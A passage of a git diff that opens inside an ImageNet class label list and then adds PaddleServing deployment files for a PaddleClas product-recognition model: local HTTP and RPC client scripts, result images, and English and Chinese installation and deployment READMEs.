+ptarmigan, +ruffed grouse, partridge, Bonasa umbellus, +prairie chicken, prairie grouse, prairie fowl, +peacock, +quail, +partridge, +African grey, African gray, Psittacus erithacus, +macaw, +sulphur-crested cockatoo, Kakatoe galerita, Cacatua galerita, +lorikeet, +coucal, +bee eater, +hornbill, +hummingbird, +jacamar, +toucan, +drake, +red-breasted merganser, Mergus serrator, +goose, +black swan, Cygnus atratus, +tusker, +echidna, spiny anteater, anteater, +platypus, duckbill, duckbilled platypus, duck-billed platypus, Ornithorhynchus anatinus, +wallaby, brush kangaroo, +koala, koala bear, kangaroo bear, native bear, Phascolarctos cinereus, +wombat, +jellyfish, +sea anemone, anemone, +brain coral, +flatworm, platyhelminth, +nematode, nematode worm, roundworm, +conch, +snail, +slug, +sea slug, nudibranch, +chiton, coat-of-mail shell, sea cradle, polyplacophore, +chambered nautilus, pearly nautilus, nautilus, +Dungeness crab, Cancer magister, +rock crab, Cancer irroratus, +fiddler crab, +king crab, Alaska crab, Alaskan king crab, Alaska king crab, Paralithodes camtschatica, +American lobster, Northern lobster, Maine lobster, Homarus americanus, +spiny lobster, langouste, rock lobster, crawfish, crayfish, sea crawfish, +crayfish, crawfish, crawdad, crawdaddy, +hermit crab, +isopod, +white stork, Ciconia ciconia, +black stork, Ciconia nigra, +spoonbill, +flamingo, +little blue heron, Egretta caerulea, +American egret, great white heron, Egretta albus, +bittern, +crane, +limpkin, Aramus pictus, +European gallinule, Porphyrio porphyrio, +American coot, marsh hen, mud hen, water hen, Fulica americana, +bustard, +ruddy turnstone, Arenaria interpres, +red-backed sandpiper, dunlin, Erolia alpina, +redshank, Tringa totanus, +dowitcher, +oystercatcher, oyster catcher, +pelican, +king penguin, Aptenodytes patagonica, +albatross, mollymawk, +grey whale, gray whale, devilfish, Eschrichtius gibbosus, Eschrichtius robustus, +killer whale, killer, orca, grampus, sea wolf, Orcinus orca, +dugong, Dugong dugon, +sea lion, +Chihuahua, +Japanese spaniel, +Maltese dog, Maltese terrier, Maltese, +Pekinese, Pekingese, Peke, +Shih-Tzu, +Blenheim spaniel, +papillon, +toy terrier, +Rhodesian ridgeback, +Afghan hound, Afghan, +basset, basset hound, +beagle, +bloodhound, sleuthhound, +bluetick, +black-and-tan coonhound, +Walker hound, Walker foxhound, +English foxhound, +redbone, +borzoi, Russian wolfhound, +Irish wolfhound, +Italian greyhound, +whippet, +Ibizan hound, Ibizan Podenco, +Norwegian elkhound, elkhound, +otterhound, otter hound, +Saluki, gazelle hound, +Scottish deerhound, deerhound, +Weimaraner, +Staffordshire bullterrier, Staffordshire bull terrier, +American Staffordshire terrier, Staffordshire terrier, American pit bull terrier, pit bull terrier, +Bedlington terrier, +Border terrier, +Kerry blue terrier, +Irish terrier, +Norfolk terrier, +Norwich terrier, +Yorkshire terrier, +wire-haired fox terrier, +Lakeland terrier, +Sealyham terrier, Sealyham, +Airedale, Airedale terrier, +cairn, cairn terrier, +Australian terrier, +Dandie Dinmont, Dandie Dinmont terrier, +Boston bull, Boston terrier, +miniature schnauzer, +giant schnauzer, +standard schnauzer, +Scotch terrier, Scottish terrier, Scottie, +Tibetan terrier, chrysanthemum dog, +silky terrier, Sydney silky, +soft-coated wheaten terrier, +West Highland white terrier, +Lhasa, Lhasa apso, +flat-coated retriever, +curly-coated retriever, +golden retriever, +Labrador retriever, +Chesapeake Bay retriever, +German short-haired pointer, +vizsla, Hungarian pointer, +English setter, +Irish setter, red setter, +Gordon setter, +Brittany spaniel, +clumber, clumber spaniel, +English springer, English springer spaniel, +Welsh springer spaniel, +cocker spaniel, English cocker spaniel, cocker, +Sussex spaniel, +Irish water spaniel, +kuvasz, +schipperke, +groenendael, +malinois, +briard, +kelpie, +komondor, +Old English sheepdog, bobtail, +Shetland sheepdog, Shetland sheep dog, Shetland, +collie, +Border collie, +Bouvier des Flandres, Bouviers des Flandres, +Rottweiler, +German shepherd, German shepherd dog, German police dog, alsatian, +Doberman, Doberman pinscher, +miniature pinscher, +Greater Swiss Mountain dog, +Bernese mountain dog, +Appenzeller, +EntleBucher, +boxer, +bull mastiff, +Tibetan mastiff, +French bulldog, +Great Dane, +Saint Bernard, St Bernard, +Eskimo dog, husky, +malamute, malemute, Alaskan malamute, +Siberian husky, +dalmatian, coach dog, carriage dog, +affenpinscher, monkey pinscher, monkey dog, +basenji, +pug, pug-dog, +Leonberg, +Newfoundland, Newfoundland dog, +Great Pyrenees, +Samoyed, Samoyede, +Pomeranian, +chow, chow chow, +keeshond, +Brabancon griffon, +Pembroke, Pembroke Welsh corgi, +Cardigan, Cardigan Welsh corgi, +toy poodle, +miniature poodle, +standard poodle, +Mexican hairless, +timber wolf, grey wolf, gray wolf, Canis lupus, +white wolf, Arctic wolf, Canis lupus tundrarum, +red wolf, maned wolf, Canis rufus, Canis niger, +coyote, prairie wolf, brush wolf, Canis latrans, +dingo, warrigal, warragal, Canis dingo, +dhole, Cuon alpinus, +African hunting dog, hyena dog, Cape hunting dog, Lycaon pictus, +hyena, hyaena, +red fox, Vulpes vulpes, +kit fox, Vulpes macrotis, +Arctic fox, white fox, Alopex lagopus, +grey fox, gray fox, Urocyon cinereoargenteus, +tabby, tabby cat, +tiger cat, +Persian cat, +Siamese cat, Siamese, +Egyptian cat, +cougar, puma, catamount, mountain lion, painter, panther, Felis concolor, +lynx, catamount, +leopard, Panthera pardus, +snow leopard, ounce, Panthera uncia, +jaguar, panther, Panthera onca, Felis onca, +lion, king of beasts, Panthera leo, +tiger, Panthera tigris, +cheetah, chetah, Acinonyx jubatus, +brown bear, bruin, Ursus arctos, +American black bear, black bear, Ursus americanus, Euarctos americanus, +ice bear, polar bear, Ursus Maritimus, Thalarctos maritimus, +sloth bear, Melursus ursinus, Ursus ursinus, +mongoose, +meerkat, mierkat, +tiger beetle, +ladybug, ladybeetle, lady beetle, ladybird, ladybird beetle, +ground beetle, carabid beetle, +long-horned beetle, longicorn, longicorn beetle, +leaf beetle, chrysomelid, +dung beetle, +rhinoceros beetle, +weevil, +fly, +bee, +ant, emmet, pismire, +grasshopper, hopper, +cricket, +walking stick, walkingstick, stick insect, +cockroach, roach, +mantis, mantid, +cicada, cicala, +leafhopper, +lacewing, lacewing fly, +"dragonfly, darning needle, devils darning needle, sewing needle, snake feeder, snake doctor, mosquito hawk, skeeter hawk", +damselfly, +admiral, +ringlet, ringlet butterfly, +monarch, monarch butterfly, milkweed butterfly, Danaus plexippus, +cabbage butterfly, +sulphur butterfly, sulfur butterfly, +lycaenid, lycaenid butterfly, +starfish, sea star, +sea urchin, +sea cucumber, holothurian, +wood rabbit, cottontail, cottontail rabbit, +hare, +Angora, Angora rabbit, +hamster, +porcupine, hedgehog, +fox squirrel, eastern fox squirrel, Sciurus niger, +marmot, +beaver, +guinea pig, Cavia cobaya, +sorrel, +zebra, +hog, pig, grunter, squealer, Sus scrofa, +wild boar, boar, Sus scrofa, +warthog, +hippopotamus, hippo, river horse, Hippopotamus amphibius, +ox, +water buffalo, water ox, Asiatic buffalo, Bubalus bubalis, +bison, +ram, tup, +bighorn, bighorn sheep, cimarron, Rocky Mountain bighorn, Rocky Mountain sheep, Ovis canadensis, +ibex, Capra ibex, +hartebeest, +impala, Aepyceros melampus, +gazelle, +Arabian camel, dromedary, Camelus dromedarius, +llama, +weasel, +mink, +polecat, fitch, foulmart, foumart, Mustela putorius, +black-footed ferret, ferret, Mustela nigripes, +otter, +skunk, polecat, wood pussy, +badger, +armadillo, +three-toed sloth, ai, Bradypus tridactylus, +orangutan, orang, orangutang, Pongo pygmaeus, +gorilla, Gorilla gorilla, +chimpanzee, chimp, Pan troglodytes, +gibbon, Hylobates lar, +siamang, Hylobates syndactylus, Symphalangus syndactylus, +guenon, guenon monkey, +patas, hussar monkey, Erythrocebus patas, +baboon, +macaque, +langur, +colobus, colobus monkey, +proboscis monkey, Nasalis larvatus, +marmoset, +capuchin, ringtail, Cebus capucinus, +howler monkey, howler, +titi, titi monkey, +spider monkey, Ateles geoffroyi, +squirrel monkey, Saimiri sciureus, +Madagascar cat, ring-tailed lemur, Lemur catta, +indri, indris, Indri indri, Indri brevicaudatus, +Indian elephant, Elephas maximus, +African elephant, Loxodonta africana, +lesser panda, red panda, panda, bear cat, cat bear, Ailurus fulgens, +giant panda, panda, panda bear, coon bear, Ailuropoda melanoleuca, +barracouta, snoek, +eel, +coho, cohoe, coho salmon, blue jack, silver salmon, Oncorhynchus kisutch, +rock beauty, Holocanthus tricolor, +anemone fish, +sturgeon, +gar, garfish, garpike, billfish, Lepisosteus osseus, +lionfish, +puffer, pufferfish, blowfish, globefish, +abacus, +abaya, +"academic gown, academic robe, judges robe", +accordion, piano accordion, squeeze box, +acoustic guitar, +aircraft carrier, carrier, flattop, attack aircraft carrier, +airliner, +airship, dirigible, +altar, +ambulance, +amphibian, amphibious vehicle, +analog clock, +apiary, bee house, +apron, +ashcan, trash can, garbage can, wastebin, ash bin, ash-bin, ashbin, dustbin, trash barrel, trash bin, +assault rifle, assault gun, +backpack, back pack, knapsack, packsack, rucksack, haversack, +bakery, bakeshop, bakehouse, +balance beam, beam, +balloon, +ballpoint, ballpoint pen, ballpen, Biro, +Band Aid, +banjo, +bannister, banister, balustrade, balusters, handrail, +barbell, +barber chair, +barbershop, +barn, +barometer, +barrel, cask, +barrow, garden cart, lawn cart, wheelbarrow, +baseball, +basketball, +bassinet, +bassoon, +bathing cap, swimming cap, +bath towel, +bathtub, bathing tub, bath, tub, +beach wagon, station wagon, wagon, estate car, beach waggon, station waggon, waggon, +beacon, lighthouse, beacon light, pharos, +beaker, +bearskin, busby, shako, +beer bottle, +beer glass, +bell cote, bell cot, +bib, +bicycle-built-for-two, tandem bicycle, tandem, +bikini, two-piece, +binder, ring-binder, +binoculars, field glasses, opera glasses, +birdhouse, +boathouse, +bobsled, bobsleigh, bob, +bolo tie, bolo, bola tie, bola, +bonnet, poke bonnet, +bookcase, +bookshop, bookstore, bookstall, +bottlecap, +bow, +bow tie, bow-tie, bowtie, +brass, memorial tablet, plaque, +brassiere, bra, bandeau, +breakwater, groin, groyne, mole, bulwark, seawall, jetty, +breastplate, aegis, egis, +broom, +bucket, pail, +buckle, +bulletproof vest, +bullet train, bullet, +butcher shop, meat market, +cab, hack, taxi, taxicab, +caldron, cauldron, +candle, taper, wax light, +cannon, +canoe, +can opener, tin opener, +cardigan, +car mirror, +carousel, carrousel, merry-go-round, roundabout, whirligig, +"carpenters kit, tool kit", +carton, +car wheel, +cash machine, cash dispenser, automated teller machine, automatic teller machine, automated teller, automatic teller, ATM, +cassette, +cassette player, +castle, +catamaran, +CD player, +cello, violoncello, +cellular telephone, cellular phone, cellphone, cell, mobile phone, +chain, +chainlink fence, +chain mail, ring mail, mail, chain armor, chain armour, ring armor, ring armour, +chain saw, chainsaw, +chest, +chiffonier, commode, +chime, bell, gong, +china cabinet, china closet, +Christmas stocking, +church, church building, +cinema, movie theater, movie theatre, movie house, picture palace, +cleaver, meat cleaver, chopper, +cliff dwelling, +cloak, +clog, geta, patten, sabot, +cocktail shaker, +coffee mug, +coffeepot, +coil, spiral, volute, whorl, helix, +combination lock, +computer keyboard, keypad, +confectionery, confectionary, candy store, +container ship, containership, container vessel, +convertible, +corkscrew, bottle screw, +cornet, horn, trumpet, trump, +cowboy boot, +cowboy hat, ten-gallon hat, +cradle, +crane, +crash helmet, +crate, +crib, cot, +Crock Pot, +croquet ball, +crutch, +cuirass, +dam, dike, dyke, +desk, +desktop computer, +dial telephone, dial phone, +diaper, nappy, napkin, +digital clock, +digital watch, +dining table, board, +dishrag, dishcloth, +dishwasher, dish washer, dishwashing machine, +disk brake, disc brake, +dock, dockage, docking facility, +dogsled, dog sled, dog sleigh, +dome, +doormat, welcome mat, +drilling platform, offshore rig, +drum, membranophone, tympan, +drumstick, +dumbbell, +Dutch oven, +electric fan, blower, +electric guitar, +electric locomotive, +entertainment center, +envelope, +espresso maker, +face powder, +feather boa, boa, +file, file cabinet, filing cabinet, +fireboat, +fire engine, fire truck, +fire screen, fireguard, +flagpole, flagstaff, +flute, transverse flute, +folding chair, +football helmet, +forklift, +fountain, +fountain pen, +four-poster, +freight car, +French horn, horn, +frying pan, frypan, skillet, +fur coat, +garbage truck, dustcart, +gasmask, respirator, gas helmet, +gas pump, gasoline pump, petrol pump, island dispenser, +goblet, +go-kart, +golf ball, +golfcart, golf cart, +gondola, +gong, tam-tam, +gown, +grand piano, grand, +greenhouse, nursery, glasshouse, +grille, radiator grille, +grocery store, grocery, food market, market, +guillotine, +hair slide, +hair spray, +half track, +hammer, +hamper, +hand blower, blow dryer, blow drier, hair dryer, hair drier, +hand-held computer, hand-held microcomputer, +handkerchief, hankie, hanky, hankey, +hard disc, hard disk, fixed disk, +harmonica, mouth organ, harp, mouth harp, +harp, +harvester, reaper, +hatchet, +holster, +home theater, home theatre, +honeycomb, +hook, claw, +hoopskirt, crinoline, +horizontal bar, high bar, +horse cart, horse-cart, +hourglass, +iPod, +iron, smoothing iron, +"jack-o-lantern", +jean, blue jean, denim, +jeep, landrover, +jersey, T-shirt, tee shirt, +jigsaw puzzle, +jinrikisha, ricksha, rickshaw, +joystick, +kimono, +knee pad, +knot, +lab coat, laboratory coat, +ladle, +lampshade, lamp shade, +laptop, laptop computer, +lawn mower, mower, +lens cap, lens cover, +letter opener, paper knife, paperknife, +library, +lifeboat, +lighter, light, igniter, ignitor, +limousine, limo, +liner, ocean liner, +lipstick, lip rouge, +Loafer, +lotion, +loudspeaker, speaker, speaker unit, loudspeaker system, speaker system, +"loupe, jewelers loupe", +lumbermill, sawmill, +magnetic compass, +mailbag, postbag, +mailbox, letter box, +maillot, +maillot, tank suit, +manhole cover, +maraca, +marimba, xylophone, +mask, +matchstick, +maypole, +maze, labyrinth, +measuring cup, +medicine chest, medicine cabinet, +megalith, megalithic structure, +microphone, mike, +microwave, microwave oven, +military uniform, +milk can, +minibus, +miniskirt, mini, +minivan, +missile, +mitten, +mixing bowl, +mobile home, manufactured home, +Model T, +modem, +monastery, +monitor, +moped, +mortar, +mortarboard, +mosque, +mosquito net, +motor scooter, scooter, +mountain bike, all-terrain bike, off-roader, +mountain tent, +mouse, computer mouse, +mousetrap, +moving van, +muzzle, +nail, +neck brace, +necklace, +nipple, +notebook, notebook computer, +obelisk, +oboe, hautboy, hautbois, +ocarina, sweet potato, +odometer, hodometer, mileometer, milometer, +oil filter, +organ, pipe organ, +oscilloscope, scope, cathode-ray oscilloscope, CRO, +overskirt, +oxcart, +oxygen mask, +packet, +paddle, boat paddle, +paddlewheel, paddle wheel, +padlock, +paintbrush, +"pajama, pyjama, pjs, jammies", +palace, +panpipe, pandean pipe, syrinx, +paper towel, +parachute, chute, +parallel bars, bars, +park bench, +parking meter, +passenger car, coach, carriage, +patio, terrace, +pay-phone, pay-station, +pedestal, plinth, footstall, +pencil box, pencil case, +pencil sharpener, +perfume, essence, +Petri dish, +photocopier, +pick, plectrum, plectron, +pickelhaube, +picket fence, paling, +pickup, pickup truck, +pier, +piggy bank, penny bank, +pill bottle, +pillow, +ping-pong ball, +pinwheel, +pirate, pirate ship, +pitcher, ewer, +"plane, carpenters plane, woodworking plane", +planetarium, +plastic bag, +plate rack, +plow, plough, +"plunger, plumbers helper", +Polaroid camera, Polaroid Land camera, +pole, +police van, police wagon, paddy wagon, patrol wagon, wagon, black Maria, +poncho, +pool table, billiard table, snooker table, +pop bottle, soda bottle, +pot, flowerpot, +"potters wheel", +power drill, +prayer rug, prayer mat, +printer, +prison, prison house, +projectile, missile, +projector, +puck, hockey puck, +punching bag, punch bag, punching ball, punchball, +purse, +quill, quill pen, +quilt, comforter, comfort, puff, +racer, race car, racing car, +racket, racquet, +radiator, +radio, wireless, +radio telescope, radio reflector, +rain barrel, +recreational vehicle, RV, R.V., +reel, +reflex camera, +refrigerator, icebox, +remote control, remote, +restaurant, eating house, eating place, eatery, +revolver, six-gun, six-shooter, +rifle, +rocking chair, rocker, +rotisserie, +rubber eraser, rubber, pencil eraser, +rugby ball, +rule, ruler, +running shoe, +safe, +safety pin, +saltshaker, salt shaker, +sandal, +sarong, +sax, saxophone, +scabbard, +scale, weighing machine, +school bus, +schooner, +scoreboard, +screen, CRT screen, +screw, +screwdriver, +seat belt, seatbelt, +sewing machine, +shield, buckler, +shoe shop, shoe-shop, shoe store, +shoji, +shopping basket, +shopping cart, +shovel, +shower cap, +shower curtain, +ski, +ski mask, +sleeping bag, +slide rule, slipstick, +sliding door, +slot, one-armed bandit, +snorkel, +snowmobile, +snowplow, snowplough, +soap dispenser, +soccer ball, +sock, +solar dish, solar collector, solar furnace, +sombrero, +soup bowl, +space bar, +space heater, +space shuttle, +spatula, +speedboat, +"spider web, spiders web", +spindle, +sports car, sport car, +spotlight, spot, +stage, +steam locomotive, +steel arch bridge, +steel drum, +stethoscope, +stole, +stone wall, +stopwatch, stop watch, +stove, +strainer, +streetcar, tram, tramcar, trolley, trolley car, +stretcher, +studio couch, day bed, +stupa, tope, +submarine, pigboat, sub, U-boat, +suit, suit of clothes, +sundial, +sunglass, +sunglasses, dark glasses, shades, +sunscreen, sunblock, sun blocker, +suspension bridge, +swab, swob, mop, +sweatshirt, +swimming trunks, bathing trunks, +swing, +switch, electric switch, electrical switch, +syringe, +table lamp, +tank, army tank, armored combat vehicle, armoured combat vehicle, +tape player, +teapot, +teddy, teddy bear, +television, television system, +tennis ball, +thatch, thatched roof, +theater curtain, theatre curtain, +thimble, +thresher, thrasher, threshing machine, +throne, +tile roof, +toaster, +tobacco shop, tobacconist shop, tobacconist, +toilet seat, +torch, +totem pole, +tow truck, tow car, wrecker, +toyshop, +tractor, +trailer truck, tractor trailer, trucking rig, rig, articulated lorry, semi, +tray, +trench coat, +tricycle, trike, velocipede, +trimaran, +tripod, +triumphal arch, +trolleybus, trolley coach, trackless trolley, +trombone, +tub, vat, +turnstile, +typewriter keyboard, +umbrella, +unicycle, monocycle, +upright, upright piano, +vacuum, vacuum cleaner, +vase, +vault, +velvet, +vending machine, +vestment, +viaduct, +violin, fiddle, +volleyball, +waffle iron, +wall clock, +wallet, billfold, notecase, pocketbook, +wardrobe, closet, press, +warplane, military plane, +washbasin, handbasin, washbowl, lavabo, wash-hand basin, +washer, automatic washer, washing machine, +water bottle, +water jug, +water tower, +whiskey jug, +whistle, +wig, +window screen, +window shade, +Windsor tie, +wine bottle, +wing, +wok, +wooden spoon, +wool, woolen, woollen, +worm fence, snake fence, snake-rail fence, Virginia fence, +wreck, +yawl, +yurt, +web site, website, internet site, site, +comic book, +crossword puzzle, crossword, +street sign, +traffic light, traffic signal, stoplight, +book jacket, dust cover, dust jacket, dust wrapper, +menu, +plate, +guacamole, +consomme, +hot pot, hotpot, +trifle, +ice cream, icecream, +ice lolly, lolly, lollipop, popsicle, +French loaf, +bagel, beigel, +pretzel, +cheeseburger, +hotdog, hot dog, red hot, +mashed potato, +head cabbage, +broccoli, +cauliflower, +zucchini, courgette, +spaghetti squash, +acorn squash, +butternut squash, +cucumber, cuke, +artichoke, globe artichoke, +bell pepper, +cardoon, +mushroom, +Granny Smith, +strawberry, +orange, +lemon, +fig, +pineapple, ananas, +banana, +jackfruit, jak, jack, +custard apple, +pomegranate, +hay, +carbonara, +chocolate sauce, chocolate syrup, +dough, +meat loaf, meatloaf, +pizza, pizza pie, +potpie, +burrito, +red wine, +espresso, +cup, +eggnog, +alp, +bubble, +cliff, drop, drop-off, +coral reef, +geyser, +lakeside, lakeshore, +promontory, headland, head, foreland, +sandbar, sand bar, +seashore, coast, seacoast, sea-coast, +valley, vale, +volcano, +ballplayer, baseball player, +groom, bridegroom, +scuba diver, +rapeseed, +daisy, +"yellow ladys slipper, yellow lady-slipper, Cypripedium calceolus, Cypripedium parviflorum", +corn, +acorn, +hip, rose hip, rosehip, +buckeye, horse chestnut, conker, +coral fungus, +agaric, +gyromitra, +stinkhorn, carrion fungus, +earthstar, +hen-of-the-woods, hen of the woods, Polyporus frondosus, Grifola frondosa, +bolete, +ear, spike, capitulum, +toilet tissue, toilet paper, bathroom tissue diff --git a/Smart_container/PaddleClas/deploy/paddleserving/imgs/results.png b/Smart_container/PaddleClas/deploy/paddleserving/imgs/results.png new file mode 100644 index 0000000..4d6db75 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/paddleserving/imgs/results.png differ diff --git a/Smart_container/PaddleClas/deploy/paddleserving/imgs/results_recog.png b/Smart_container/PaddleClas/deploy/paddleserving/imgs/results_recog.png new file mode 100644 index 0000000..37393d5 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/paddleserving/imgs/results_recog.png differ diff --git a/Smart_container/PaddleClas/deploy/paddleserving/imgs/start_server.png b/Smart_container/PaddleClas/deploy/paddleserving/imgs/start_server.png new file mode 100644 index 0000000..8294e19 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/paddleserving/imgs/start_server.png differ diff --git a/Smart_container/PaddleClas/deploy/paddleserving/imgs/start_server_recog.png b/Smart_container/PaddleClas/deploy/paddleserving/imgs/start_server_recog.png new file mode 100644 index 0000000..d4344a1 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/paddleserving/imgs/start_server_recog.png differ diff --git a/Smart_container/PaddleClas/deploy/paddleserving/pipeline_http_client.py b/Smart_container/PaddleClas/deploy/paddleserving/pipeline_http_client.py new file mode 100644 index 0000000..49b3ce0 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/pipeline_http_client.py @@ -0,0 +1,17 @@ +import requests +import json +import base64 +import os + +def cv2_to_base64(image): + return base64.b64encode(image).decode('utf8') + +if __name__ == "__main__": + url = "http://127.0.0.1:18080/imagenet/prediction" + with open(os.path.join(".", "daisy.jpg"), 'rb') as file: + image_data1 = file.read() + image = cv2_to_base64(image_data1) + data = {"key": ["image"], "value": [image]} + for i in range(100): + r = requests.post(url=url, data=json.dumps(data)) + print(r.json()) diff --git a/Smart_container/PaddleClas/deploy/paddleserving/pipeline_rpc_client.py b/Smart_container/PaddleClas/deploy/paddleserving/pipeline_rpc_client.py new file mode 100644 index 0000000..75bcae0 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/pipeline_rpc_client.py @@ -0,0 +1,33 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +try: + from paddle_serving_server_gpu.pipeline import PipelineClient +except ImportError: + from paddle_serving_server.pipeline import PipelineClient +import base64 + +client = PipelineClient() +client.connect(['127.0.0.1:9993']) + +def cv2_to_base64(image): + return base64.b64encode(image).decode('utf8') + +if __name__ == "__main__": + with open("daisy.jpg", 'rb') as file: + image_data = file.read() + image = cv2_to_base64(image_data) + + for i in range(1): + ret = client.predict(feed_dict={"image": image}, fetch=["label", "prob"]) + print(ret) diff --git a/Smart_container/PaddleClas/deploy/paddleserving/recognition/README.md b/Smart_container/PaddleClas/deploy/paddleserving/recognition/README.md new file mode 100644 index 0000000..005e418 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/recognition/README.md @@ -0,0 +1,178 @@ +# Product Recognition Service deployment based on PaddleServing + +(English|[简体中文](./README_CN.md)) + +This document will introduce how to use the [PaddleServing](https://github.com/PaddlePaddle/Serving/blob/develop/README.md) to deploy the product recognition model based on retrieval method as a pipeline online service. + +Some Key Features of Paddle Serving: +- Integrate with Paddle training pipeline seamlessly, most paddle models can be deployed with one line command. +- Industrial serving features supported, such as models management, online loading, online A/B testing etc. +- Highly concurrent and efficient communication between clients and servers supported. + +The introduction and tutorial of Paddle Serving service deployment framework reference [document](https://github.com/PaddlePaddle/Serving/blob/develop/README.md). + +## Contents +- [Environmental preparation](#environmental-preparation) +- [Model conversion](#model-conversion) +- [Paddle Serving pipeline deployment](#paddle-serving-pipeline-deployment) +- [FAQ](#faq) + + +## Environmental preparation + +PaddleClas operating environment and PaddleServing operating environment are needed. + +1. Please prepare PaddleClas operating environment reference [link](../../docs/zh_CN/tutorials/install.md). + Download the corresponding paddle whl package according to the environment, it is recommended to install version 2.1.0. + +2. The steps of PaddleServing operating environment prepare are as follows: + + Install serving which used to start the service + ``` + pip3 install paddle-serving-server==0.6.1 # for CPU + pip3 install paddle-serving-server-gpu==0.6.1 # for GPU + # Other GPU environments need to confirm the environment and then choose to execute the following commands + pip3 install paddle-serving-server-gpu==0.6.1.post101 # GPU with CUDA10.1 + TensorRT6 + pip3 install paddle-serving-server-gpu==0.6.1.post11 # GPU with CUDA11 + TensorRT7 + ``` + +3. Install the client to send requests to the service + In [download link](https://github.com/PaddlePaddle/Serving/blob/develop/doc/LATEST_PACKAGES.md) find the client installation package corresponding to the python version. + The python3.7 version is recommended here: + + ``` + wget https://paddle-serving.bj.bcebos.com/test-dev/whl/paddle_serving_client-0.0.0-cp37-none-any.whl + pip3 install paddle_serving_client-0.0.0-cp37-none-any.whl + ``` + +4. Install serving-app + ``` + pip3 install paddle-serving-app==0.6.1 + ``` + + **note:** If you want to install the latest version of PaddleServing, refer to [link](https://github.com/PaddlePaddle/Serving/blob/develop/doc/LATEST_PACKAGES.md). + + + +## Model conversion +When using PaddleServing for service deployment, you need to convert the saved inference model into a serving model that is easy to deploy. +The following assumes that the current working directory is the PaddleClas root directory + +Firstly, download the inference model of ResNet50_vd +``` +cd deploy +# Download and unzip the ResNet50_vd model +wget -P models/ https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/models/inference/product_ResNet50_vd_aliproduct_v1.0_infer.tar +cd models +tar -xf product_ResNet50_vd_aliproduct_v1.0_infer.tar +``` + +Then, you can use installed paddle_serving_client tool to convert inference model to mobile model. +``` +# Product recognition model conversion +python3 -m paddle_serving_client.convert --dirname ./product_ResNet50_vd_aliproduct_v1.0_infer/ \ + --model_filename inference.pdmodel \ + --params_filename inference.pdiparams \ + --serving_server ./product_ResNet50_vd_aliproduct_v1.0_serving/ \ + --serving_client ./product_ResNet50_vd_aliproduct_v1.0_client/ +``` + +After the ResNet50_vd inference model is converted, there will be additional folders of `product_ResNet50_vd_aliproduct_v1.0_serving` and `product_ResNet50_vd_aliproduct_v1.0_client` in the current folder, with the following format: +``` +|- product_ResNet50_vd_aliproduct_v1.0_serving/ + |- __model__ + |- __params__ + |- serving_server_conf.prototxt + |- serving_server_conf.stream.prototxt + +|- product_ResNet50_vd_aliproduct_v1.0_client + |- serving_client_conf.prototxt + |- serving_client_conf.stream.prototxt +``` + +Once you have the model file for deployment, you need to change the alias name in `serving_server_conf.prototxt`: change `alias_name` in `fetch_var` to `features`, +The modified serving_server_conf.prototxt file is as follows: +``` +feed_var { + name: "x" + alias_name: "x" + is_lod_tensor: false + feed_type: 1 + shape: 3 + shape: 224 + shape: 224 +} +fetch_var { + name: "save_infer_model/scale_0.tmp_1" + alias_name: "features" + is_lod_tensor: true + fetch_type: 1 + shape: -1 +} +``` + +Next,download and unpack the built index of product gallery +``` +cd ../ +wget https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/data/recognition_demo_data_v1.1.tar && tar -xf recognition_demo_data_v1.1.tar +``` + + + +## Paddle Serving pipeline deployment + +**Attention:** pipeline deployment mode does not support Windows platform + +1. Download the PaddleClas code, if you have already downloaded it, you can skip this step. + ``` + git clone https://github.com/PaddlePaddle/PaddleClas + + # Enter the working directory + cd PaddleClas/deploy/paddleserving/recognition + ``` + + The paddleserving directory contains the code to start the pipeline service and send prediction requests, including: + ``` + __init__.py + config.yml # configuration file of starting the service + pipeline_http_client.py # script to send pipeline prediction request by http + pipeline_rpc_client.py # script to send pipeline prediction request by rpc + recognition_web_service.py # start the script of the pipeline server + ``` + +2. Run the following command to start the service. + ``` + # Start the service and save the running log in log.txt + python3 recognition_web_service.py &>log.txt & + ``` + After the service is successfully started, a log similar to the following will be printed in log.txt + ![](../imgs/start_server_recog.png) + +3. Send service request + ``` + python3 pipeline_http_client.py + ``` + After successfully running, the predicted result of the model will be printed in the cmd window. An example of the result is: + ![](../imgs/results_recog.png) + + Adjust the number of concurrency in config.yml to get the largest QPS. + + ``` + op: + concurrency: 8 + ... + ``` + + Multiple service requests can be sent at the same time if necessary. + + The predicted performance data will be automatically written into the `PipelineServingLogs/pipeline.tracer` file. + + +## FAQ +**Q1**: No result return after sending the request. + +**A1**: Do not set the proxy when starting the service and sending the request. You can close the proxy before starting the service and before sending the request. The command to close the proxy is: +``` +unset https_proxy +unset http_proxy +``` diff --git a/Smart_container/PaddleClas/deploy/paddleserving/recognition/README_CN.md b/Smart_container/PaddleClas/deploy/paddleserving/recognition/README_CN.md new file mode 100644 index 0000000..b8b8128 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/recognition/README_CN.md @@ -0,0 +1,174 @@ +# 基于PaddleServing的商品识别服务部署 + +([English](./README.md)|简体中文) + +本文以商品识别为例,介绍如何使用[PaddleServing](https://github.com/PaddlePaddle/Serving/blob/develop/README_CN.md)工具部署PaddleClas动态图模型的pipeline在线服务。 + +相比较于hubserving部署,PaddleServing具备以下优点: +- 支持客户端和服务端之间高并发和高效通信 +- 支持 工业级的服务能力 例如模型管理,在线加载,在线A/B测试等 +- 支持 多种编程语言 开发客户端,例如C++, Python和Java + +更多有关PaddleServing服务化部署框架介绍和使用教程参考[文档](https://github.com/PaddlePaddle/Serving/blob/develop/README_CN.md)。 + +## 目录 +- [环境准备](#环境准备) +- [模型转换](#模型转换) +- [Paddle Serving pipeline部署](#部署) +- [FAQ](#FAQ) + + +## 环境准备 + 